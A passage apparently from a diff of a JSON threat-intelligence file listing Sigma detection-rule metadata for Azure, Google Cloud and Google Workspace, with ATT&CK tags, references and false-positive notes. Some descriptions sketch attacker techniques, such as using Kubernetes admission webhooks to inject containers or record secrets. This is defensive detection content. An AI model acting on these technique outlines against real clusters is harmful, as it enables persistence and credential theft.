"azure_pim_alerts_disabled.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Administrator disabling PIM alerts as an active choice." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when changes are made to PIM roles", - "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", - "value": "Changes To PIM Settings", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/09", - "filename": "azure_pim_change_settings.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Legit administrative PIM setting configuration changes" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user is added to a privileged role.", - "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", - "value": "User Added To Privilege Role", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/06", - "filename": "azure_priviledged_role_assignment_add.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Legtimate administrator actions of adding members from a role" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user is removed from a privileged role. 
Bulk changes should be investigated.", - "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", - "value": "Bulk Deletion Changes To Privileged Account Permissions", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2022/08/05", - "filename": "azure_priviledged_role_assignment_bulk_change.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Legtimate administrator actions of removing members from a role" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a new admin is created.", - "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", - "value": "Privileged Account Creation", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_privileged_account_creation.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", - "level": "medium", - "falsepositive": [ - "A legitimate new admin account being created" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "uuid": 
"c1182e02-49a3-481c-b3de-0fadc4091488", - "value": "Rare Subscription-level Operations In Azure", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" - ], - "tags": [ - "attack.t1003" - ], - "creation_date": "2020/05/07", - "filename": "azure_rare_operations.yml", - "author": "sawwinnnaung", - "level": "medium", - "falsepositive": [ - "Valid change" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a service principal is created in Azure.", - "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", - "value": "Azure Service Principal Created", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/02", - "filename": "azure_service_principal_created.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service principal being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a service principal was removed in Azure.", - "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", - "value": "Azure Service Principal Removed", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/03", - "filename": "azure_service_principal_removed.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service principal being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", - "value": "Azure Subscription Permission Elevation Via ActivityLogs", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/11/26", - "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", - "author": "Austin Songer @austinsonger", - "level": "high", - "falsepositive": [ - "If this was approved by System Administrator." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", - "value": "Azure Subscription Permission Elevation Via AuditLogs", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/11/26", - "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", - "author": "Austin Songer @austinsonger", - "level": "high", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a suppression rule is created in Azure. 
Adversary's could attempt this to evade detection.", - "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", - "value": "Azure Suppression Rule Created", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "azure_suppression_rule_created.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Suppression Rule being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a temporary access pass (TAP) is added to an account. 
TAPs added to priv accounts should be investigated", - "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", - "value": "Temporary Access Pass Added To An Account", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/10", - "filename": "azure_tap_added.yml", - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Administrator adding a legitmate temporary access pass" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when there is a interruption in the authentication process.", - "uuid": "8366030e-7216-476b-9927-271d79f13cf3", - "value": "Azure Unusual Authentication Interruption", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/11/26", - "filename": "azure_unusual_authentication_interruption.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", - "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", - "value": "Users Authenticating To Other Azure AD Tenants", - "meta": { - "refs": [ - 
"https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/06/30", - "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights\u2248 of unauthorizeed login to valid accounts.\n", - "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", - "value": "User Access Blocked by Azure Conditional Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2021/10/10", - "filename": "azure_user_login_blocked_by_conditional_access.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when a user has reset their password in Azure AD", - "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", - "value": "Password Reset By User Account", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" - ], - "tags": [ - 
"attack.t1078" - ], - "creation_date": "2022/08/03", - "filename": "azure_user_password_change.yml", - "author": "YochanaHenderson, '@Yochana-H'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator or confirmed user action." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a Virtual Network is modified or deleted in Azure.", - "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", - "value": "Azure Virtual Network Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_virtual_network_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a VPN connection is modified or deleted.", - "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", - "value": "Azure VPN Connection Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_vpn_connection_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when storage bucket is enumerated in Google Cloud.", - "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", - "value": "Google Cloud Storage Buckets Enumeration", - "meta": { - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" - ], - "tags": [ - "attack.discovery" - ], - "creation_date": "2021/08/14", - "filename": "gcp_bucket_enumeration.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Storage Buckets being enumerated may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects when storage bucket is modified or deleted in Google Cloud.", - "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", - "value": "Google Cloud Storage Buckets Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/14", - "filename": "gcp_bucket_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when sensitive information is re-identified in google Cloud.", - "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", - "value": "Google Cloud Re-identifies Sensitive Information", - "meta": { - "refs": [ - "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565" - ], - "creation_date": "2021/08/15", - "filename": "gcp_dlp_re_identifies_sensitive_information.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", - "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", - "value": "Google Cloud DNS Zone Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/dns/docs/reference/v1/managedZones", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/15", - "filename": "gcp_dns_zone_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", - "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", - "value": "Google Cloud Firewall Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - 
"https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2021/08/13", - "filename": "gcp_firewall_rule_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", - "Exceptions can be added to this rule to filter expected behavior." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", - "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", - "value": "Google Full Network Traffic Packet Capture", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074" - ], - "creation_date": "2021/08/13", - "filename": "gcp_full_network_traffic_packet_capture.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Full Network Packet Capture may be done by a system or network administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", - "value": "Google Cloud Kubernetes Admission Controller", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ], - "creation_date": "2021/11/25", - "filename": "gcp_kubernetes_admission_controller.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. 
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", - "value": "Google Cloud Kubernetes CronJob", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ], - "creation_date": "2021/11/22", - "filename": "gcp_kubernetes_cronjob.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding. 
This includes RoleBindings and ClusterRoleBinding.", - "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", - "value": "Google Cloud Kubernetes RoleBinding", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/pull/1267", - "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", - "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", - "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2021/08/09", - "filename": "gcp_kubernetes_rolebinding.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when the Secrets are Modified or Deleted.", - "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", - "value": "Google Cloud Kubernetes Secrets Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2021/08/09", - "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a service account is disabled or deleted in Google Cloud.", - "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", - "value": "Google Cloud Service Account Disabled or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ], - "creation_date": "2021/08/14", - "filename": "gcp_service_account_disabled_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service Account being disabled or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a service account is modified in Google Cloud.", - "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", - "value": "Google Cloud Service Account Modified", - "meta": { - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/14", - "filename": "gcp_service_account_modified.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detect when a Cloud SQL DB has been modified or deleted.", - "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", - "value": "Google Cloud SQL Database Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/10/15", - "filename": "gcp_sql_database_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "SQL Database being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", - "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", - "value": "Google Cloud VPN Tunnel Modified or Deleted", - "meta": { - "refs": [ - "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "VPN Tunnel being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects when an an application is removed from Google Workspace.", - "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", - "value": "Google Workspace Application Removed", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/26", - "filename": "gworkspace_application_removed.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Application being removed may be performed by a System Administrator." 
- ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an API access service account is granted domain authority.", - "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", - "value": "Google Workspace Granted Domain API Access", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2021/08/23", - "filename": "gworkspace_granted_domain_api_access.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when multi-factor authentication (MFA) is disabled.", - "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", - "value": "Google Workspace MFA Disabled", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/26", - "filename": "gworkspace_mfa_disabled.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "MFA may be disabled and performed by a system administrator." 
